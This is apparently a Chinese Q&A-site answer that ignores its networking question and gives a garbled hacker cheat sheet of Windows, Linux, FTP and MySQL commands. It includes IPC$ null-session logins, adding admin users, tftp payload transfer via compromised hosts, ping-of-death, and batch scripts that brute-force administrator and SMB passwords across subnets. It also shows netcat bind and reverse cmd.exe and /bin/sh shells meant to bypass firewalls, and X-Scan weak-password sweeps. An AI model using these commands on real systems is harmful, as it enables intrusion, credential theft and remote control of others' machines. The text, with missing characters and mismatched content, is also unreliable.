如何将应用程序发送出去的数据包传送到本机的内核层
最新回答
ぇ气
2025-03-28 05:50:29
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆映射C:本H:
net use h: \\ip\c$ 登陆映射C:本H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射本H:映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激guest用户
net user 查看哪些用户
net user 帐户名 查看帐户属性
net localgroup ***istrators 用户名 /add 用户添加管理员使其具管理员权限,注意:***istrator加s用复数
net start 查看启哪些服务
net start 服务名 启服务;(:net start telnet net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看间
net time \\目标ip /set 设置本计算机间与目标IP主机间同步,加参数/yes取消确认信息
net view 查看本局域网内启哪些共享
net view \\ip 查看局域网内启哪些共享
net config 显示系统网络设置
net logoff 断连接共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向发信息
net ver 局域网内使用网络连接类型信息
net share 查看本启共享
net share ipc$ 启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆用密码改12345
net password 密码 更改系统登陆密码
netstat -a 查看启哪些端口,用netstat -an
netstat -n 查看端口网络连接情况用netstat -an
netstat -v 查看进行工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看使用所协议使用情况
nbtstat -A ip 136139其端口查看近登陆用户名(03前用户名)-注意:参数-A要写
tracert -参数 ip(或计算机名) 跟踪路由(数据包)参数:-w数字用于设置超间隔
ping ip(或域名) 向主机发送默认32字节数据参数:-l[空格]数据包;-n发送数据数;-t指直ping
ping -t -l 65550 ip 死亡ping(发送于64K文件并直ping死亡ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本ip址ipconfig用参数/all显示全部配置信息
tlist -t 树行列表显示进程(系统附加工具默认没安装安装目录Support/tools文件夹内)
kill -F 进程名 加-F参数强制结束某进程(系统附加工具默认没安装安装目录Support/tools文件夹内)
del -F 文件名 加-F参数删除读文件,/AR、/AH、/AS、/AA别表示删除读、隐藏、系统、存档文件/A-R、/A-H、/A-S、/A-A表示删除除读、隐藏、系统、存档外文件例DEL/AR *.*表示删除前目录所读文件DEL/A-S *.*表示删除前目录除系统文件外所文件
#2 二:
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录所目录文件同使用参数/Q 取消删除操作系统确认直接删除(二命令作用相同)
move 盘符\路径\要移文件名 存放移文件路径\移文件名 移文件,用参数/y取消确认移目录存相同文件提示直接覆盖
fc one.txt two.txt > 3st.txt 比二文件并同处输3st.txt文件"> ""> >" 重定向命令
at id号 启已注册某计划任务
at /delete 停止所计划任务用参数/yes则需要确认直接停止
at id号 /delete 停止某已注册计划任务
at 查看所计划任务
at \\ip time 程序名(或命令) /r 某间运行某程序并重新启计算机
finger username @host 查看近哪些用户登陆
telnet ip 端口 远登陆服务器,默认端口23
open ip 连接IP(属telnet登陆命令)
telnet 本机直接键入telnet 进入本机telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1指定目录文件2用参数/y同取消确认要改写份现存目录文件
copy c:\srv.exe \\ip\***$ 复制本c:\srv.exe***
cppy 1st.jpg/b+2st.txt/a 3st.jpg 2st.txt内容藏身1st.jpg3st.jpg新文件注:2st.txt文件要空三排参数:/b指二进制文件/a指ASCLL格式文件
copy \\ip\***$\svv.exe c:\ 或:copy\\ip\***$\*.* 复制***i$共享srv.exe文件(所文件)至本C:
xcopy 要复制文件或目录树 目标址\目录名 复制文件目录树用参数/Y提示覆盖相同文件
tftp -i 自IP(用肉机作跳板用肉机IP) get server.exe c:\server.exe 登陆IPserver.exe载目标主机c:\server.exe 参数:-i指二进制模式传送传送exe文件用加-i 则ASCII模式(传送文本文件模式)进行传送
tftp -i IP put c:\server.exe 登陆传本c:\server.exe至主机
ftp ip 端口 用于传文件至服务器或进行文件操作默认端口21bin指用二进制式传送(执行文件进);默认ASCII格式传送(文本文件)
route print 显示IP路由主要显示网络址Network addres网掩码Netmask网关址Gateway addres接口址Interface
arp 查看处理ARP缓存ARP名字解析意思负责IP解析物理性MAC址arp -a显示全部信息
start 程序名或命令 /max 或/min 新新窗口并化(化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 掉(添加)某文件 存档读系统隐藏 属性;用+则添加某属性
dir 查看文件参数:/Q显示文件及目录属系统哪用户/T:C显示文件创建间/T:A显示文件访问间/T:W修改间
date /t 、 time /t 使用参数即DATE/T、TIME/T显示前期间必输入新期间
set 指定环境变量名称=要指派给变量字符 设置环境变量
set 显示前所环境变量
set p(或其字符) 显示前字符p(或其字符)所环境变量
pause 暂停批处理程序并显示:请按任意键继续....
if 批处理程序执行条件处理(更说明见if命令及变量)
goto 标签 cmd.exe导向批处理程序带标签行(标签必须单独行且冒号打例::start标签)
call 路径\批处理文件名 批处理程序调用另批处理程序 (更说明见call /?)
for 组文件每文件执行某特定命令(更说明见for命令及变量)
echo on或off 打或关闭echo仅用echo加参数则显示前echo设置
echo 信息 屏幕显示信息
echo 信息 >> pass.txt "信息"保存pass.txt文件
findstr "Hello" aa.txt aa.txt文件寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe显示命令提示符(C:\、D:\统改:EntSky\ )
#3 三:
ver DOS窗口显示版本信息
winver 弹窗口显示版本信息(内存、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 树形结构显示目录用参数-f 列第文件夹文件名称
type 文件名 显示文本文件内容
more 文件名 逐屏显示输文件
doskey 要锁定命令=字符
doskey 要解锁命令= DOS提供锁定命令(编辑命令行重新调用win2k命令并创建宏):锁定dir命令:doskey dir=entsky (能用doskey dir=dir);解锁:doskey dir=
taskmgr 调任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘错误
tlntadmn telnt服务admn,键入tlntadmn选择3再选择8,更改telnet服务默认端口23其任何端口
exit 退cmd.exe程序或目前用参数/B则退前批处理脚本cmd.exe
path 路径\执行文件文件名 执行文件设置路径
cmd 启win2K命令解释窗口参数:/eff、/en 关闭、启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入任何提示;
regedit /e 注册表文件名 导注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针NTFS格式参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm : N R 读取 W 写入 C 更改(写入)F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问
cacls 文件名 查看文件访问用户权限列表
REM 文本内容 批处理文件添加注解
netsh 查看或更改本网络配置情况
#4 四:
IIS服务命令:
iisreset /reboot 重启win2k计算机(提示系统重启信息现)
iisreset /start或stop 启(停止)所Internet服务
iisreset /restart 停止重新启所Internet服务
iisreset /status 显示所Internet服务状态
iisreset /enable或disable 本系统启用(禁用)Internet服务重新启
iisreset /rebootonerror 启、停止或重新启Internet服务若发错误重新机
iisreset /noforce 若停止Internet服务强制终止Internet服务
iisreset /timeout Val达逾间(秒)仍未停止Internet服务若指定/rebootonerror参数则电脑重新机预设值重新启20秒停止60秒重新机0秒
FTP 命令: (面详细说明内容)
ftp命令行格式:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器所响应信息
-d 使用调试式
-n 限制ftp自登录,即使用.netrc文件
-g 取消全局文件名
help [命令] 或 [命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退FTP管理式.
pwd 列前远端主机目录
put 或 send 本文件名 [传主机文件名] 本文件传送至远端主机
get 或 recv [远程主机文件名] [载本文件名] 远端主机传送至本主机
mget [remote-files] 远端主机接收批文件至本主机
mput local-files 本主机批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列前远端主机目录文件.本文件,结写至本文件
ascii 设定ASCII式传送文件(缺省值)
bin 或 image 设定二进制式传送文件
bell 每完文件传送,报警提示
cdup 返级目录
close 断与远程服务器ftp(与open应)
open host[port] 建立指定ftp服务器连接,指定连接端口
delete 删除远端主机文件
mdelete [remote-files] 删除批文件
mkdir directory-name 远端主机建立目录
rename [from] [to] 改变远端主机文件名
rmdir directory-name 删除远端主机目录
status 显示前FTP状态
system 显示远端主机系统类型
user user-name [password] [account] 重新别用户名登录远端主机
open host [port] 重新建立新连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变前本主机工作目录,缺省,转前用户HOME目录
chmod 改变远端主机文件权限
case ON,用MGET命令拷贝文件名本机器,全部转换写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录父目录
! 本机执行交互shellexitftp环境,!ls*.zip
#5 五:
MYSQL 命令:
mysql -h主机址 -u用户名 -p密码 连接MYSQL;刚安装MYSQL超级用户root没密码
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root用加空格其)
exit 退MYSQL
mysql*** -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户(注意:面同面MYSQL环境命令所面都带号作命令结束符)
show databases; 显示数据库列表刚始才两数据库:mysqltestmysql库重要面MYSQL系统信息我改密码新增用户实际用库进行操作
use mysql;
show tables; 显示库数据表
describe 表名; 显示数据表结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库删表
delete from 表名; 表记录清空
select * from 表名; 显示表记录
mysqldump --opt school>school.bbb 备份数据库:(命令DOS\\mysql\\bin目录执行);注释:数据库school备份school.bbb文件school.bbb文本文件文件名任取打看看新发现
win2003系统新增命令(实用部份):
shutdown /参数 关闭或重启本或远程主机
参数说明:/S 关闭主机/R 重启主机 /T 数字 设定延间范围0~180秒间 /A取消机/M //IP 指定远程主机
例:shutdown /r /t 0 立即重启本主机(延)
taskill /参数 进程名或进程pid 终止或任务进程
参数说明:/PID 要终止进程pid,用tasklist命令获各进程pid/IM 要终止进程进程名/F 强制终止进程/T 终止指定进程及所启进程
tasklist 显示前运行本远程主机进程、服务、服务各进程进程标识符(PID)
参数说明:/M 列前进程加载dll文件/SVC 显示每进程应服务参数列前进程
#6 六:
Linux系统基本命令: 要区写
uname 显示版本信息(同win2K ver)
dir 显示前目录文件,ls -al 显示包括隐藏文件(同win2K dir)
pwd 查询前所目录位置
cd cd ..层目录注意cd 与..间空格cd /返根目录
cat 文件名 查看文件内容
cat >abc.txt 往abc.txt文件写内容
more 文件名 页页式显示文本文件
cp 复制文件
mv 移文件
rm 文件名 删除文件rm -a 目录名删除目录及目录
mkdir 目录名 建立目录
rmdir 删除目录目录内没文档
chmod 设定档案或目录存取权限
grep 档案查找字符串
diff 档案文件比较
find 档案搜寻
date 现期、间
who 查询目前使用同台机器及Login间点
w 查询目前机者详细资料
whoami 查看自帐号名称
groups 查看某Group
passwd 更改密码
history 查看自命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通用编译C语言写文件
su 权限转换指定使用者
telnet IP telnet连接主机(同win2K)现bash$说明连接功
ftp ftp连接某服务器(同win2K)
附:批处理命令与变量
1:for命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定单字母替换参数:%i 指定变量则用:%%i 调用变量用:%i% 变量区写(%i 等于 %I)
批处理每能处理变量%0—%9共10其%0默认给批处理文件名使用%1默认使用批处理输入第值同理:%2—%9指输入第2-9值;例:net use \\ip\ipc$ pass /user:user ip%1,pass%2 ,user%3
(set):指定或组文件使用通配符:(D:\user.txt)(1 1 254)(1 -1 254),{ (1 1 254)第"1"指起始值第二"1"指增量第三"254"指结束值即:1254;(1 -1 254)说明:即2541 }
command:指定第文件执行命令:net use命令;要执行命令命令间加:& 隔
command_parameters:特定命令指定参数或命令行关
IN (set):指(set)取值;DO command :指执行command
参数:/L 指用增量形式{ (set)增量形式 };/F 指文件断取值直取完止{ (set)文件(d:\pass.txt) }
用举例:
@echo off
echo 用格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:***istrator | find "命令功完" >>test.txt
存test.bat 说明:指定C类网段254IP依试建立***istrator密码空IPC$连接功该IP存test.txt
/L指用增量形式(即1-254或254-1);输入IP前面三位:*.*.*批处理默认 %1;%%G 变量(ip位);& 用隔echo net use 二命令;| 指建立ipc$结用find查看否"命令功完"信息;%1.%%G 完整IP址;(1 1 254) 指起始值增量结止值
@echo off
echo 用格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存:ok.exe 说明:输入IP用字典文件d:\pass.dic暴解d:\user.dic用户密码直文件值取完止%%i用户名;%1输入IP址(默认)
#7 七:
2:if命令及变量 基本格式:
IF [not] errorlevel 数字 命令语句 程序运行返等于或于指定数字退编码指定条件真
例:IF errorlevel 0 命令 指程序执行返值0值行面命令;IF not errorlevel 1 命令指程序执行返值等于1执行面命令
0 指发现并功执行(真);1 指没发现、没执行(假)
IF [not] 字符串1==字符串2 命令语句 指定文本字符串匹配(即:字符串1 等于 字符串2)执行面命令
例:if "%2%"=="4" goto start指:输入第二变量4执行面命令(注意:调用变量%变量名%并加" ")
IF [not] exist 文件名 命令语句 指定文件名存执行面命令
例:if not nc.exe goto end指:没发现nc.exe文件跳":end"标签处
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加:else 命令语句指:前面条件立指行else面命令注意:else 必须与 if 同行才效 del命令需del命令全部内容用 >括起del命令要单独行才能执行用 >等于单独行;例:if exist test.txt. else echo test.txt.missing 注意命令.
(二)系统外部命令(均需载相关工具):
1、瑞士军刀:nc.exe
参数说明:
-h 查看帮助信息
-d 台模式
-e prog程序重定向连接执行〔危险〕
-i secs延间隔
-l 监听模式用于入站连接
-L 监听模式连接闭仍继续监听直CTR+C
-n IP址能用域名
-o film记录16进制传输
-p[空格]端口 本端口号
-r 随机本及远程端口
-t 使用Telnet交互式
-u UDP模式
-v 详细输用-vv更详细
-w数字 timeout延间隔
-z 输入输关掉(用于扫锚)
基本用:
nc -nvv 192.168.0.1 80 连接192.168.0.1主机80端口
nc -l -p 80 启本机TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.180-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机cmdshellremoteTCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机cmdshell并反向连接192.168.0.25354端口
高级用:
nc -L -p 80 作蜜罐用1:启并停监听80端口直CTR+C止
nc -L -p 80 > c:\log.txt 作蜜罐用2:启并停监听80端口直CTR+C,同结输c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作蜜罐用3-1:启并停监听80端口直CTR+C,并c:\honeyport.txt内容送入管道亦起传送文件作用
type.exe c:\honeyport | nc -L -p 80 作蜜罐用3-2:启并停监听80端口直CTR+C,并c:\honeyport.txt内容送入管道,亦起传送文件作用
本机用:nc -l -p 本机端口
主机用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破主机防火墙
本机用:nc -d -l -p 本机端口 < 要传送文件路径及名称
主机用:nc -vv 本机IP 本机端口 > 存放文件路径及名称 传送文件主机
备 注:
| 管道命令
或 > 重定向命令<例:tlntadmn < test.txt 指test.txt内容赋值给tlntadmn命令
@ 表示执行@面命令显示(台执行);例:@dir c:\winnt >> d:\log.txt 意思:台执行dir并结存d:\log.txt
>与>>区别 ">"指:覆盖;">>"指:保存(添加)
:@dir c:\winnt >> d:\log.txt@dir c:\winnt > d:\log.txt二命令别执行二比较看:用>>则二结都保存用:>则结第二结第覆盖
#8 八:
2、扫锚工具:xscan.exe
基本格式
xscan -host [-] [其选项] 扫锚"起始IP终止IP"段所主机信息
xscan -file [其选项] 扫锚"主机IP列表文件名"所主机信息
检测项目
-active 检测主机否存
-os 检测远程操作系统类型(通NETBIOSSNMP协议)
-port 检测用服务端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测所项目
其选项
-i 适配器编号 设置网络适配器, 通"-l"参数获取
-l 显示所网络适配器
-v 显示详细扫描进度
-p 跳没响应主机
-o 跳没检测放端口主机
-t 并发线程数量,并发主机数量 指定并发线程数量并发主机数量, 默认数量100,10
-log 文件名 指定扫描报告文件名 (缀:TXT或HTML格式文件)
用示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机所漏洞跳响应主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机标准端口状态NT弱口令用户并发线程数量150跳没检测放端口主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测hostlist.txt文件列所主机标准端口状态CGI漏洞并发线程数量200同刻检测5台主机显示详细检测进度跳没检测放端口主机
热门标签
